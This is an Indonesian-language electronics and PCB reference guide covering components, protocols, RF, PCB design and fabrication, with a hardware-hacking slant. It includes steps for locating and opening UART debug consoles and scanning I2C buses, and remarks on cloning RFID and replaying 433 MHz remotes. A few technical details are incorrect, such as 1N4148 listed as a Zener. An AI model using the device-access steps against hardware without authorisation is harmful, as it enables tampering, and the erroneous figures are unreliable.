§ 01 — Dasar Elektronika
Konsep & Hukum Dasar
Elektronika adalah ilmu yang mempelajari kontrol aliran elektron dalam material konduktor dan semikonduktor untuk memproses informasi atau energi. Semua perangkat keras — dari sensor IoT hingga firmware exploit platform — berakar pada prinsip-prinsip berikut.
Besaran Dasar Listrik
| Besaran | Simbol | Satuan | Definisi |
|---|---|---|---|
| Tegangan | V | Volt (V) | Beda potensial antara dua titik — "tekanan" yang mendorong arus |
| Arus | I | Ampere (A) | Laju aliran muatan listrik (Coulomb/detik) |
| Resistansi | R | Ohm (Ω) | Hambatan terhadap aliran arus |
| Kapasitansi | C | Farad (F) | Kemampuan menyimpan muatan |
| Induktansi | L | Henry (H) | Kemampuan menyimpan energi medan magnet |
| Daya | P | Watt (W) | Laju transfer energi |
| Frekuensi | f | Hertz (Hz) | Jumlah siklus per detik |
| Impedansi | Z | Ohm (Ω) | Resistansi total termasuk reaktansi (AC) |
Hukum Ohm
Fondasi analisis rangkaian DC sederhana:
V = I × R | I = V/R | R = V/I
P = V × I = I²R = V²/R
Hukum Kirchhoff
KCL — Kirchhoff's Current Law
Jumlah arus masuk ke sebuah node = jumlah arus keluar. Arus tidak dapat "hilang" di node.
ΣI_masuk = ΣI_keluar
KVL — Kirchhoff's Voltage Law
Jumlah aljabar tegangan dalam loop tertutup = 0.
ΣV_loop = 0
Rangkaian Seri vs Paralel
Resistor Seri
R_total = R1 + R2 + ... + Rn
Arus sama di semua komponen. Tegangan terbagi.
Resistor Paralel
1/R_total = 1/R1 + 1/R2 + ... + 1/Rn
Tegangan sama di semua komponen. Arus terbagi.
Thevenin & Norton
Dua teorema yang memungkinkan menyederhanakan jaringan kompleks menjadi model sederhana:
- Thevenin: Sumber tegangan
V_th+ resistansiR_thseri - Norton: Sumber arus
I_N+ resistansiR_Nparalel - Hubungan:
V_th = I_N × R_N,R_th = R_N
Analisis AC — Impedansi & Reaktansi
| Komponen | Impedansi | Behavior |
|---|---|---|
| Resistor | Z = R | Tidak frekuensi-dependen |
| Kapasitor | Z_C = 1/(jωC) | Impedansi ↑ saat frekuensi ↓ — blokir DC, loloskan AC |
| Induktor | Z_L = jωL | Impedansi ↑ saat frekuensi ↑ — loloskan DC, blokir AC |
Di mana ω = 2πf (frekuensi sudut, rad/s).
Filter RC Dasar
Low-Pass Filter (LPF)
Resistor di jalur sinyal, kapasitor ke ground. Frekuensi cutoff: f_c = 1/(2πRC). Loloskan sinyal di bawah f_c, attenuasi di atas.
High-Pass Filter (HPF)
Kapasitor di jalur sinyal, resistor ke ground. Frekuensi cutoff sama. Loloskan sinyal di atas f_c, attenuasi di bawah.
💡 Relevansi Hardware Hacking
Filter RC krusial untuk bypass EMI, decoupling power rail, dan memahami sinyal saat sniffing protokol serial. Filter LC digunakan di power supply switching — penting saat fault injection.
§ 02 — Komponen Pasif
Resistor, Kapasitor & Induktor
Resistor
Komponen paling fundamental — membatasi arus dan membagi tegangan. Tersedia dalam package THT (through-hole) dan SMD.
Kode Warna Resistor THT
| Warna | Digit | Multiplier | Toleransi |
|---|---|---|---|
| Hitam | 0 | ×1 | — |
| Coklat | 1 | ×10 | ±1% |
| Merah | 2 | ×100 | ±2% |
| Oranye | 3 | ×1K | — |
| Kuning | 4 | ×10K | — |
| Hijau | 5 | ×100K | ±0.5% |
| Biru | 6 | ×1M | ±0.25% |
| Ungu | 7 | ×10M | ±0.1% |
| Abu-abu | 8 | — | ±0.05% |
| Putih | 9 | — | — |
| Emas | — | ×0.1 | ±5% |
| Perak | — | ×0.01 | ±10% |
Package SMD — Kode EIA
| Package | Dimensi (inci) | Dimensi (mm) | Power Rating Tipikal |
|---|---|---|---|
| 0402 | 0.04×0.02" | 1.0×0.5 mm | 62.5 mW |
| 0603 | 0.06×0.03" | 1.6×0.8 mm | 100 mW |
| 0805 | 0.08×0.05" | 2.0×1.25 mm | 125 mW |
| 1206 | 0.12×0.06" | 3.2×1.6 mm | 250 mW |
| 2512 | 0.25×0.12" | 6.3×3.2 mm | 1 W |
Kapasitor
Menyimpan dan melepas energi dalam medan listrik. Tiga jenis utama yang perlu dikuasai:
| Jenis | Range | Voltase Max | Keunggulan | Kelemahan |
|---|---|---|---|---|
| Elektrolit (Al) | 1µF–100mF | 6.3–450V | Kapasitansi besar, murah | Polar, ESR tinggi, lifetime terbatas |
| Keramik (MLCC) | 1pF–100µF | 4–250V | ESR rendah, non-polar, kecil | Kapasitansi berubah dengan voltage (X5R/X7R) |
| Tantalum | 100nF–1mF | 2.5–50V | Stabil, ESR rendah | Mahal, bisa meledak jika reverse-bias |
Decoupling Capacitor
Setiap IC wajib punya decoupling cap 100nF (0.1µF) keramik sedekat mungkin ke pin VCC. Fungsi: menyaring noise power supply, menyediakan burst current saat switching.
/* Aturan decoupling praktis */
- 100nF MLCC: tiap IC, sedekat mungkin ke pin VCC
- 10µF MLCC/tantalum: tiap subsistem (MCU, modul RF, dll)
- 100µF+ elektrolit: di input/output regulator
- Seri ESR vs kapasitansi: C_bypass = I_transient / (ΔV × f_switch)Induktor & Transformator
Induktor menyimpan energi dalam medan magnet. Kritikal di:
- Buck/boost converter — komponen switching utama
- Ferrite bead — filter EMI pada jalur power (impedansi tinggi di frekuensi tinggi)
- Common-mode choke — filter noise common-mode di USB, Ethernet
- RF choke — blokir RF masuk ke power supply
⚠ Perhatian Desain
Jangan anggap remeh placement capacitor decoupling. Trace panjang antara IC dan decoupling cap = induktansi parasitik = filter tidak bekerja optimal. Di frekuensi tinggi (>100MHz), letak fisik lebih penting dari nilai kapasitansi.
§ 03 — Semikonduktor
Semikonduktor & IC Analog
Dioda
| Tipe | Vf Tipikal | Kegunaan | Part Contoh |
|---|---|---|---|
| Si Rectifier | 0.6–0.7V | Rectifier, proteksi polarity | 1N4001–1N4007 |
| Schottky | 0.2–0.4V | Power supply switching, OR-ing | BAT43, SS14, MBRS340 |
| Zener | Vz (fixed) | Voltage reference, clamp proteksi | BZX55, 1N4148 |
| LED | 1.8–3.5V | Indicator, optocoupler | Berbagai warna |
| TVS | — | ESD protection, surge protection | SMAJ5.0A, PESD5V0 |
| Tunnel | Negatif diff | Osilator frekuensi sangat tinggi | — |
Transistor BJT
Bipolar Junction Transistor — tiga terminal: Base, Collector, Emitter. Dua tipe: NPN dan PNP.
I_C = β × I_B | β (hFE) = 20–500 (tipikal)
Mode operasi:
- Cut-off: I_B = 0, transistor OFF. Gunakan sebagai switch OFF.
- Saturasi: V_CE ≈ 0.2V, transistor ON penuh. Gunakan sebagai switch ON.
- Aktif: I_C = β×I_B, gunakan sebagai amplifier.
Contoh Driver LED / Relay dengan BJT NPN (misal 2N2222, BC547)
/* Resistor basis: R_B = (V_logic - V_BE) / I_B_sat */
/* I_B_sat = I_C / β × 10 (faktor saturasi 10) */
V_logic = 3.3V, V_BE = 0.7V, I_C = 100mA, β = 100
I_B_sat = (100mA / 100) × 10 = 10mA
R_B = (3.3 - 0.7) / 0.01 = 260Ω → gunakan 220ΩMOSFET
Metal-Oxide-Semiconductor FET — dikendalikan tegangan (Gate), bukan arus. Jauh lebih efisien untuk switching daya. Terminal: Gate (G), Drain (D), Source (S).
| Parameter | Penjelasan | Relevansi Desain |
|---|---|---|
| V_GS(th) | Threshold gate voltage — minimal untuk konduksi | Pastikan logic level cukup untuk drive MOSFET (3.3V logic → pilih MOSFET V_th ≤2V) |
| R_DS(on) | Resistansi drain-source saat ON | Memengaruhi disipasi panas: P = I²×R_DS(on) |
| Q_g | Gate charge total | Menentukan kecepatan switching dan driver current yang dibutuhkan |
| V_DS(max) | Maks tegangan drain-source | Pilih minimal 20% headroom dari V_supply |
| I_D(max) | Maks arus drain | Pilih minimal 2× dari arus operasi |
MOSFET sebagai High-Side Switch
Untuk switch N-Channel high-side, butuh gate voltage > V_source + V_th → perlu bootstrap circuit atau gate driver IC. Alternatif: P-Channel MOSFET (lebih mudah drive tapi R_DS(on) lebih tinggi).
Op-Amp (Operational Amplifier)
IC analog serbaguna. Input differensial (+, -), satu output. Aturan dasar:
- Input impedansi sangat tinggi (teoritis ∞)
- Output impedansi sangat rendah (teoritis 0)
- Open-loop gain sangat besar (105 – 106)
Konfigurasi Umum
| Konfigurasi | Gain | Kegunaan |
|---|---|---|
| Inverting Amp | -R_f/R_in | Amplifikasi dengan inversi fase |
| Non-Inverting Amp | 1 + R_f/R_g | Amplifikasi tanpa inversi |
| Voltage Follower | 1 (0 dB) | Buffer impedansi tinggi → rendah |
| Summing Amp | -R_f/R_in | Mixer audio, DAC sederhana |
| Comparator | ∞ (tanpa feedback) | Deteksi threshold, zero-crossing |
| Integrator | -1/(jωRC) | Mengintegrasikan sinyal (ADC sigma-delta) |
| Differentiator | -jωRC | Deteksi edge, rate-of-change |
Voltage Regulator
| Tipe | Cara Kerja | Efisiensi | Part Contoh |
|---|---|---|---|
| LDO Linear | Dissipasi excess voltage sebagai panas | Rendah: η = V_out/V_in | LM1117, AMS1117, MIC5219 |
| Buck (Step-Down) | Switching + induktor + kapasitor | Tinggi: 85–95% | LM2596, MP2307, TPS62xxx |
| Boost (Step-Up) | Switching dengan energi induktor | Tinggi: 80–92% | MT3608, LM2577, TPS61xxx |
| Buck-Boost | Input < atau > output | 75–88% | LTC3115, TPS63xxx |
§ 04 — Digital
Elektronika Digital
Logika Digital & Gerbang Logika
| Gerbang | Fungsi | Simbol Boolean | IC 74xx |
|---|---|---|---|
| AND | 1 jika semua input 1 | Y = A·B | 74HC08 |
| OR | 1 jika ada input 1 | Y = A+B | 74HC32 |
| NOT (Inverter) | Membalik input | Y = Ā | 74HC04 |
| NAND | AND + NOT | Y = ̄(A·B) | 74HC00 |
| NOR | OR + NOT | Y = ̄(A+B) | 74HC02 |
| XOR | 1 jika input berbeda | Y = A⊕B | 74HC86 |
| XNOR | XOR + NOT | Y = ̄(A⊕B) | 74HC266 |
Level Tegangan Logika
| Family | VCC | V_IH min | V_IL max | I_OH max |
|---|---|---|---|---|
| TTL (LS) | 5V | 2.0V | 0.8V | -0.4mA |
| CMOS (HC) | 2–6V | 3.5V @5V | 1.0V @5V | -4mA |
| LVTTL | 3.3V | 2.0V | 0.8V | -8mA |
| LVCMOS | 3.3V / 1.8V | 0.65×VCC | 0.35×VCC | Varies |
⚠ Level Shifting
Menghubungkan 5V output ke input 3.3V GPIO langsung = merusak MCU. Gunakan: voltage divider (R1/R2), level shifter (BSS138), atau resistor + dioda clamp ke VCC.
Flip-Flop & Register
Elemen memori dasar logika digital:
- D Flip-Flop: Output Q mengikuti input D di clock edge. Dasar register shift.
- SR Flip-Flop: Set/Reset. Dasar latch dan debouncer tombol.
- JK Flip-Flop: Toggle, Set, Reset — paling fleksibel.
- T Flip-Flop: Toggle di setiap clock — dasar binary counter.
ADC & DAC
| Tipe ADC | Kecepatan | Resolusi | Kegunaan |
|---|---|---|---|
| SAR (Successive Approx) | Menengah (1 Msps) | 8–16 bit | MCU built-in ADC, sensor |
| Delta-Sigma (ΔΣ) | Lambat (<1 Msps) | 16–24 bit | Audio, presisi tinggi, timbangan |
| Flash ADC | Sangat cepat (>1 Gsps) | 6–8 bit | Oscilloscope, SDR, radar |
| Dual-Slope | Sangat lambat | 12–18 bit | Multimeter digital, tegangan stabil |
PWM — Pulse Width Modulation
Output digital yang merepresentasikan nilai analog melalui duty cycle. Hampir semua MCU punya timer PWM hardware.
V_avg = V_high × (T_on / T_period) = V_high × Duty_Cycle
Penggunaan: kontrol motor (kecepatan), LED dimmer, sinyal servo, DAC sederhana (PWM + filter RC).
§ 05 — Mikrokontroler
Mikrokontroler & SoC
Perbandingan Platform Populer
| Platform | Core | Clock | Flash/RAM | Connectivity | Use Case |
|---|---|---|---|---|---|
| ATmega328P | AVR 8-bit | 16 MHz | 32K/2K | UART,SPI,I2C | Simple embedded, Arduino |
| STM32F103 | ARM CM3 32-bit | 72 MHz | 128K/20K | UART,SPI,I2C,USB,CAN | General purpose, BadUSB |
| STM32F4xx | ARM CM4 32-bit | 168 MHz | 1M/192K | Full + Crypto,FPU | High perf, DSP, USB HS |
| RP2040 | Dual ARM CM0+ | 133 MHz | ext/264K SRAM | UART,SPI,I2C,PIO | Raspberry Pi Pico, DMA tricks |
| ESP32-S3 | Dual Xtensa LX7 | 240 MHz | 16M ext/512K | WiFi,BT5,BLE,USB-OTG | IoT, WiFi hacking, BLE |
| ESP32-C3 | RISC-V 32-bit | 160 MHz | 4M/400K | WiFi,BLE,USB-Serial | Low cost WiFi node |
| nRF52840 | ARM CM4 | 64 MHz | 1M/256K | BLE5,Thread,USB,NFC | BLE hacking, keystroke inject |
SoC untuk Embedded Linux
| Platform | CPU | RAM | Connectivity | Use Case |
|---|---|---|---|---|
| Raspberry Pi 4 | 4× CM A72 | 1–8 GB | GbE,WiFi,BT,USB3 | Full Linux, pentest platform |
| Orange Pi Zero 2 | 4× CM A53 | 512M–1G | WiFi,BT,GbE | Compact Linux node |
| Banana Pi BPI-R3 | MT7986 (4C) | 2 GB | Dual WiFi6,2×GbE,SFP | Router platform, OpenWRT |
| Allwinner H3 | 4× CM A7 | 512M–2G | 100M Ethernet | Embedded Linux, DIY |
GPIO & Peripheral Interface
/* Peripheral mapping tipikal STM32 */
PA0–PA15 : GPIO Port A (bisa dikonfigurasi sebagai ADC, Timer, dll)
USART1 : PA9 (TX), PA10 (RX)
SPI1 : PA5 (SCK), PA6 (MISO), PA7 (MOSI), PA4 (NSS)
I2C1 : PB6 (SCL), PB7 (SDA)
USB FS : PA11 (D-), PA12 (D+)
JTAG : PA13 (SWDIO), PA14 (SWCLK), PB3 (TDO), PA15 (TDI)
/* Alternate Function (AF) harus dikonfigurasi di register MODER, AFRL/AFRH */§ 06 — Protokol Komunikasi
Protokol Serial & Debug
UART — Universal Async Receiver/Transmitter
Protokol paling sederhana, asinkron, point-to-point. Tidak ada clock line terpisah — kedua sisi harus agree pada baud rate.
TX → ──────────→ RX (device A ke device B)
RX ← ──────────← TX (device B ke device A)
GND ────────────── GND
RX ← ──────────← TX (device B ke device A)
GND ────────────── GND
| Parameter | Nilai Umum | Catatan |
|---|---|---|
| Baud rate | 9600, 115200, 230400, 921600 | Default console Linux: 115200 |
| Data bits | 8 (paling umum), 7, 5 | — |
| Parity | None (paling umum), Even, Odd | — |
| Stop bits | 1 (paling umum), 2 | — |
| Konfigurasi default | 8N1 | 8 data, No parity, 1 stop |
Identifikasi UART di PCB (untuk Hardware Hacking)
1. Cari test point / header 3–4 pin berdekatan
2. Gunakan multimeter: pin GND → 0V, VCC → 3.3/5V
3. TX pin: saat boot ada logic toggling (oscilloscope/logic analyzer)
4. TX tegangan idle = HIGH (VCC level), RX = resistor pull-up
5. Hubungkan ke USB-UART (CP2102, CH340, FT232) dengan level yang sesuai
6. minicom / screen / picocom pada Linux:
screen /dev/ttyUSB0 115200SPI — Serial Peripheral Interface
Protokol sinkron, full-duplex, master-slave. Kecepatan bisa mencapai puluhan MHz.
SCK (Clock) — Master generate
MOSI (Master Out) — Master → Slave
MISO (Master In) — Slave → Master
CS/SS (Chip Select) — Active LOW, satu per slave
MOSI (Master Out) — Master → Slave
MISO (Master In) — Slave → Master
CS/SS (Chip Select) — Active LOW, satu per slave
SPI Mode (CPOL/CPHA):
| Mode | CPOL | CPHA | Clock Idle | Sample |
|---|---|---|---|---|
| 0 | 0 | 0 | LOW | Rising edge |
| 1 | 0 | 1 | LOW | Falling edge |
| 2 | 1 | 0 | HIGH | Falling edge |
| 3 | 1 | 1 | HIGH | Rising edge |
I2C — Inter-Integrated Circuit
Dua kabel (SCL + SDA), multi-master multi-slave, tiap device punya alamat 7-bit atau 10-bit.
SCL ── 4.7kΩ ── VCC (pull-up wajib)
SDA ── 4.7kΩ ── VCC (pull-up wajib)
Speed: Standard (100kHz), Fast (400kHz), Fast+ (1MHz), HS (3.4MHz)
SDA ── 4.7kΩ ── VCC (pull-up wajib)
Speed: Standard (100kHz), Fast (400kHz), Fast+ (1MHz), HS (3.4MHz)
Protokol I2C address scan (untuk recon hardware):
# Scan I2C bus dengan i2c-tools (Linux)
i2cdetect -y 1 # bus 1 (/dev/i2c-1)
# Output: grid address 0x00–0x7F, 'UU'=used, '--'=empty, hex=ditemukan
# Baca register dari device address 0x48
i2cget -y 1 0x48 0x00JTAG — Joint Test Action Group
Protokol debug hardware via IEEE 1149.1. Dapat mengakses CPU registers, memory, flash programming, dan boundary scan.
TCK — Test Clock
TMS — Test Mode Select (navigasi state machine TAP)
TDI — Test Data In
TDO — Test Data Out
TRST — Test Reset (opsional, active LOW)
TMS — Test Mode Select (navigasi state machine TAP)
TDI — Test Data In
TDO — Test Data Out
TRST — Test Reset (opsional, active LOW)
SWD — Serial Wire Debug
Versi 2-pin dari JTAG dari ARM. Lebih ringkas, sama powerful untuk debug Cortex-M.
SWDIO — Data In/Out (bidireksional)
SWCLK — Clock
GND — Ground
VTREF — Target voltage reference (opsional)
SWCLK — Clock
GND — Ground
VTREF — Target voltage reference (opsional)
USB — Universal Serial Bus
| Standar | Kecepatan Max | Power | Konektor |
|---|---|---|---|
| USB 1.1 LS/FS | 12 Mbps | 500mA @5V | Type-A/B |
| USB 2.0 HS | 480 Mbps | 500mA @5V | A/B/Mini/Micro |
| USB 3.2 Gen1 | 5 Gbps | 900mA @5V | A/B/C |
| USB 3.2 Gen2×2 | 20 Gbps | 3A @20V (PD) | Type-C |
Kabel USB 2.0: VBUS(5V), D-, D+, GND. Sinyal diferensial D+/D- untuk noise immunity.
CAN Bus
Protokol robust untuk otomotif dan industri — diferensial (CAN_H, CAN_L), multi-master, hingga 1Mbps. Penting untuk automotive hacking dan robotika industri. Terminator 120Ω di kedua ujung bus wajib.
§ 07 — RF & Wireless
RF & Wireless Communication
Konsep Dasar RF
| Parameter | Rumus/Keterangan |
|---|---|
| Panjang gelombang | λ = c / f (c = 3×10⁸ m/s) |
| Antena λ/4 | Panjang = 75mm / f(GHz) — quarter-wave monopole |
| dBm | Power relatif terhadap 1mW: P(dBm) = 10×log10(P/1mW) |
| Link budget | EIRP - Path Loss + Gain receiver = Signal di receiver |
| Sensitivity | Min signal level yang bisa di-decode (tipikal -100 dBm untuk LoRa) |
Modulasi
| Modulasi | Deskripsi | Aplikasi |
|---|---|---|
| AM (DSB/SSB) | Amplitudo carrier dimodulasi | Radio broadcast, AIS |
| FM | Frekuensi carrier dimodulasi | Radio FM, WBFM |
| FSK/GFSK | Frekuensi shift antara simbol | Bluetooth, POCSAG, ISM devices |
| OOK (On-Off Keying) | Carrier ON=1, OFF=0 | Remote 433MHz, 315MHz |
| ASK | Amplitudo beda untuk tiap simbol | RFID pasif, NFC |
| OFDM | Multi-carrier, anti-multipath | WiFi, LTE, DVB-T |
| BPSK/QPSK | Phase shift antar simbol | GPS, satelit, LoRa |
| LoRa (CSS) | Chirp Spread Spectrum | LPWAN, jarak jauh |
Protokol Wireless Populer
2.4 GHz
WiFi 802.11
b/g/n (2.4G), a/ac/ax (5G). OFDM, MIMO. Channels 1–13 (ID).
2.4 GHz
Bluetooth 5
Classic + BLE. GFSK, FHSS. BLE: 40 channels, 2MHz spacing.
Sub-GHz
LoRaWAN
915/868/433 MHz (Asia Pasifik: AS923). SF7–SF12, BW 125/250kHz.
13.56 MHz
NFC / ISO14443
MIFARE Classic, DESFire, ISO14443A/B. Range <10cm.
125 kHz
EM4100 / HID
Access control RFID lama. Manchester/biphase. Mudah diklon.
433/315 MHz
ISM OOK/ASK
Remote garage, alarm, sensor wireless. Mudah di-replay.
SDR — Software Defined Radio
Hardware RF yang fungsi modulasi/demodulasi dilakukan oleh software. Ideal untuk SIGINT dan wireless security research.
| Hardware | Frekuensi | TX/RX | Bandwidth | Harga |
|---|---|---|---|---|
| RTL-SDR v3 | 500kHz–1.75GHz | RX only | 2.4 MHz | ~$30 |
| HackRF One | 1MHz–6GHz | Half-duplex | 20 MHz | ~$300 |
| ADALM-PLUTO | 325MHz–3.8GHz | Full-duplex | 56 MHz | ~$100 |
| LimeSDR Mini | 10MHz–3.5GHz | Full-duplex | 30.72 MHz | ~$200 |
| USRP B210 | 70MHz–6GHz | Full-duplex | 56 MHz | ~$1500 |
§ 08 — PCB Design
Desain PCB Profesional
Alur Desain PCB
ALUR DESAIN PCB:
1. Schematic Capture
├─ Gambar skematik di KiCad / Altium / EasyEDA
├─ Assign footprint ke tiap simbol
└─ Run ERC (Electrical Rules Check)
2. PCB Layout
├─ Import netlist dari schematic
├─ Place komponen (critical first: IC, connector, power)
├─ Route traces (power/ground first)
├─ Pour copper ground plane
└─ Run DRC (Design Rules Check)
3. Design Review
├─ Cek clearance: trace-to-trace, pad-to-pad
├─ Verifikasi decoupling cap placement
├─ Signal integrity check (panjang trace kritis)
└─ Thermal analysis (komponen berdaya tinggi)
4. Gerber Generation
├─ Copper layers (F.Cu, B.Cu, inner layers)
├─ Solder mask (F.Mask, B.Mask)
├─ Silkscreen (F.Silkscreen, B.Silkscreen)
├─ Drill file (.drl / Excellon)
└─ BOM + CPL (centroid/placement file)
5. Fabrication
├─ Upload ke fab: JLCPCB, PCBWay, OSHPark
└─ Pilih: layer count, thickness, finish, colorTools Desain PCB
| Software | Lisensi | Kelebihan | Cocok untuk |
|---|---|---|---|
| KiCad 8 | Free/Open Source | Full-featured, PCB scripting (Python), SPICE | Semua level, favorit komunitas |
| EasyEDA | Free (cloud) | Terintegrasi LCSC/JLCPCB, mudah pemula | Prototyping cepat |
| Altium Designer | Berbayar mahal | Industry standard, powerful rules | Profesional / industri |
| Eagle | Freemium | Library banyak, Autodesk eco | Hobbyist, Sparkfun/Adafruit |
| gEDA / PCB | Free | Fully FOSS, scriptable | Advanced Linux users |
Design Rules — Aturan Dasar
| Parameter | JLCPCB Standard | JLCPCB Advanced | Catatan |
|---|---|---|---|
| Min trace width | 0.127mm (5mil) | 0.075mm (3mil) | Power trace lebih lebar |
| Min clearance | 0.127mm (5mil) | 0.075mm (3mil) | High voltage butuh lebih besar |
| Min drill size | 0.3mm | 0.15mm | Via terkecil |
| Min annular ring | 0.15mm | 0.1mm | Pad sekitar hole |
| Board thickness | 1.6mm (default) | 0.4–3.2mm | 1.0mm untuk fleksibel |
Trace Width vs Current
Lebar trace harus cukup untuk arus yang mengalir. Gunakan IPC-2221 calculator atau rumus:
W = (I / (k × ΔT^0.44))^(1/0.725) / (th × 0.0647)
Di mana k=0.048 (internal), 0.048 (external), ΔT = temperature rise (°C), th = thickness (oz).
| Arus (A) | Lebar Min External (1oz, ΔT=10°C) | Lebar Min Internal |
|---|---|---|
| 0.5A | 0.30mm | 0.50mm |
| 1A | 0.50mm | 0.80mm |
| 2A | 0.90mm | 1.50mm |
| 3A | 1.30mm | 2.20mm |
| 5A | 2.00mm | 3.50mm |
§ 09 — PCB Layers
Layer, Stackup & Via Types
PCB Layer Types
| Layer | Fungsi |
|---|---|
| F.Cu / Top Copper | Lapisan tembaga depan — komponen SMD utama |
| B.Cu / Bottom Copper | Lapisan tembaga belakang |
| In1.Cu, In2.Cu ... | Inner copper (PCB 4-layer+) — biasanya Power & GND plane |
| F.Mask / B.Mask | Solder mask — lapisan hijau/merah/biru yang menutupi tembaga |
| F.Paste / B.Paste | Stencil paste — untuk aperture solder paste SMD |
| F.Silkscreen | Label komponen, value, reference designator |
| Edge.Cuts | Kontur/outline PCB |
| Courtyard | Area eksklusif komponen, cegah overlap |
Stackup 4-Layer (Recommended)
STACKUP 4-LAYER STANDAR:
┌─────────────────────────────────┐
│ Layer 1: Signal (F.Cu) │ ← Komponen, signal traces
│ Prepreg (0.1mm) │
│ Layer 2: GND Plane (In1.Cu) │ ← Ground plane solid
│ Core (1.2mm) │
│ Layer 3: Power Plane (In2.Cu) │ ← VCC planes berbeda tegangan
│ Prepreg (0.1mm) │
│ Layer 4: Signal (B.Cu) │ ← Signal traces, komponen
└─────────────────────────────────┘
Benefits:
- GND plane solid = impedansi referensi stabil = SI lebih baik
- EMI jauh lebih rendah dari 2-layer
- Crosstalk minimal antara Layer 1 dan 4Via Types
| Tipe Via | Deskripsi | Cost | Kegunaan |
|---|---|---|---|
| Through-hole Via | Menembus seluruh board | Standard | Koneksi antar layer umum |
| Blind Via | Dari outer ke inner layer saja | Mahal | High-density design, BGA |
| Buried Via | Antar inner layer, tidak menyentuh outer | Sangat mahal | HDI PCB, miniaturisasi ekstrem |
| Micro Via | Laser drill, diameter <0.15mm | Premium | HDI, smartphone PCB |
| Via-in-Pad | Via di dalam pad komponen | Medium+ | QFN, BGA thermal pad |
Copper Pour & Ground Plane
Selalu isi area kosong dengan copper pour yang dihubungkan ke GND. Manfaat:
- Low-impedance return path untuk signal
- Mengurangi EMI radiasi
- Heatspreading untuk komponen panas
- Mechanical stability (warp reduction)
Gunakan thermals (spoke pad) untuk via dan pad THT agar mudah disolder. Gunakan solid pour untuk high-current atau thermal pad IC power.
Differential Pair Routing
Untuk USB D+/D-, Ethernet, PCIe, HDMI — trace harus:
- Panjang sama (matched length, maksimal ±0.1mm perbedaan)
- Spacing konsisten (biasanya 2×W, di mana W = trace width)
- Tidak melewati via jika mungkin
- Impedansi target: USB=90Ω diff, Ethernet=100Ω diff, PCIe=85Ω diff
§ 10 — Fabrikasi
Fabrikasi PCB & Assembly (PCBA)
Proses Fabrikasi PCB
PROSES FABRIKASI (simplified):
1. Laminate cutting dari FR4 (glass-epoxy) dengan copper foil
2. Inner layer imaging: film fotoresist + UV expose + etching
3. Layer lamination: press dengan suhu/tekanan tinggi
4. Drilling: mechanical drill (through-hole) / laser (micro via)
5. Plating: electroless copper deposit ke dinding hole
6. Outer layer imaging + etching
7. Solder mask apply (LPI — Liquid Photo Imageable)
8. Surface finish deposit
9. Silkscreen printing
10. Electrical test (flying probe atau bed of nails)
11. Routing/depanelization + visual inspectionSurface Finish
| Finish | Nama | Shelf Life | Solderable | Catatan |
|---|---|---|---|---|
| HASL | Hot Air Solder Leveling | 12 bulan | Sangat baik | Murah, permukaan tidak rata (masalah fine-pitch) |
| ENIG | Electroless Nickel Immersion Gold | 12 bulan | Sangat baik | Flat, cocok BGA/fine-pitch. Rentan "black pad" |
| Lead-Free HASL | HASL Pb-free | 12 bulan | Baik | RoHS compliant, sedikit lebih kasar |
| OSP | Organic Solderability Preservative | 6 bulan | Cukup | Tipis organik, murah, tidak tahan re-solder |
| ENEPIG | Electroless Ni/Pd/Au | 12 bulan | Terbaik | Mahal, untuk RF dan wire bonding |
SMT Assembly Process
PROSES PCBA SMT:
1. Solder Paste Printing
├─ Stencil baja (laser cut) 0.12–0.15mm thick
└─ Squeegee paste di atas stencil
2. Component Placement
├─ Pick & Place machine (PnP)
├─ Input: centroid file (X, Y, rotation, reference)
└─ Komponen: dari tape reel, tray, atau tube
3. Reflow Soldering
├─ Preheat zone (ramp up 1–3°C/s → 150–180°C)
├─ Soak zone (150–180°C, 60–120s, flux activation)
├─ Reflow zone (puncak 235–250°C, ≤30s)
└─ Cooling (maks 4°C/s ke bawah, cegah crack)
4. Inspection
├─ AOI (Automated Optical Inspection)
├─ X-ray (untuk BGA, QFN dengan hidden solder ball)
└─ Manual inspection
5. Through-Hole Soldering
├─ Selective soldering atau
└─ Wave solderingDefek Solder Umum dan Penyebab
| Defek | Penyebab | Solusi |
|---|---|---|
| Solder bridge | Terlalu banyak paste, pad terlalu dekat | Kurangi aperture stencil, flux + wick |
| Tombstoning | Panas tidak merata di komponen 2-pin kecil | Symmetric thermal design, slow ramp |
| Cold solder (dull) | Gerakan saat cooling, suhu kurang | Naikkan peak temp, cegah vibrasi |
| Solder ball | Moisture di paste, preheat terlalu cepat | Simpan paste di kulkas, ramp lebih lambat |
| Insufficient solder | Paste coverage kurang, aperture tersumbat | Bersihkan stencil, tambah paste volume |
| Void di BGA | Moisture, flux outgassing | Pre-bake PCB dan komponen, vacuum reflow |
§ 11 — Manufaktur
BOM Management & Sourcing Komponen
Bill of Materials (BOM)
BOM adalah daftar lengkap semua komponen dalam produk. Kolom esensial untuk PCB manufacturing:
Kolom BOM minimal untuk PCBA:
Reference : R1, C3, U2, ...
Value : 10kΩ, 100nF, STM32F103C8
Footprint : 0402, 0805, LQFP48
Quantity : per board
MPN : Manufacturer Part Number (e.g. RC0402FR-0710KL)
Manufacturer: Yageo, Murata, STMicro
Description: Resistor 10kΩ 1% 62.5mW
LCSC PN : C25804 (untuk order via JLCPCB/LCSC)Sumber Komponen
| Supplier | Keunggulan | Min Order | Pengiriman ke ID |
|---|---|---|---|
| LCSC | Harga murah, stok besar, terintegrasi JLCPCB | 1–10 pcs | 2–3 minggu DHL |
| Mouser | Stok luas, datasheet lengkap, distributor resmi | 1 pcs | 3–7 hari FedEx |
| DigiKey | Stok terbesar, cari cepat, dokumentasi baik | 1 pcs | 3–7 hari FedEx |
| AliExpress | Sangat murah, cocok prototyping, hati-hati palsu | 1 pcs | 2–4 minggu |
| Tokopedia/Shopee | Stok lokal, cepat, beli qty kecil | 1 pcs | 1–3 hari |
Fabrikasi PCB — Harga Perbandingan
| Fab House | 2-layer 100×100mm/5pcs | Kualitas | Waktu |
|---|---|---|---|
| JLCPCB | ~$2 USD | Sangat baik | 2–3 hari produksi |
| PCBWay | ~$5 USD | Sangat baik | 2–3 hari produksi |
| AllPCB | ~$3 USD | Baik | 2–3 hari produksi |
| OSHPark | ~$10 USD | Premium | 12 hari |
💡 Tips Manufaktur Produk
Untuk prototype pertama: order PCB bare dari JLCPCB + komponen dari LCSC, gunakan SMT service JLCPCB (ekonomis untuk komponen basic). Untuk produksi >100 pcs: minta quote dari PCBWay dengan full PCBA service. Selalu order 10–20% ekstra komponen untuk rework dan spare.
§ 12 — Hardware Hacking
Hardware Recon & PCB Reverse Engineering
Tahapan Hardware Security Assessment
METHODOLOGY:
1. OSINT : FCC ID database, datasheet, GitHub, Shodan
